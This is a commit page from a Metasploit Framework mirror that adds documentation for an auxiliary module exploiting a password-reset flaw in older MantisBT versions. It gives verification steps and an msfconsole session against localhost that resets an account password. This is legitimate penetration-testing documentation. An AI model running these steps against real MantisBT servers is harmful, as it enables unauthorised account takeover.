infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add some documentation

bug/bundler_fix
jvoisin 2017-07-09 02:25:11 +02:00
parent ae930ae7c1
commit e1b9330136
1 changed files with 30 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md Normal file
View File

@ -0,0 +1,30 @@
## Vulnerable Application
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
on
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.
## Scenarios
```
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set rport 8082
rport => 8082
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > run
[+] Password successfully changed to 'ndOQTmhQ'.
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_password_reset) >
```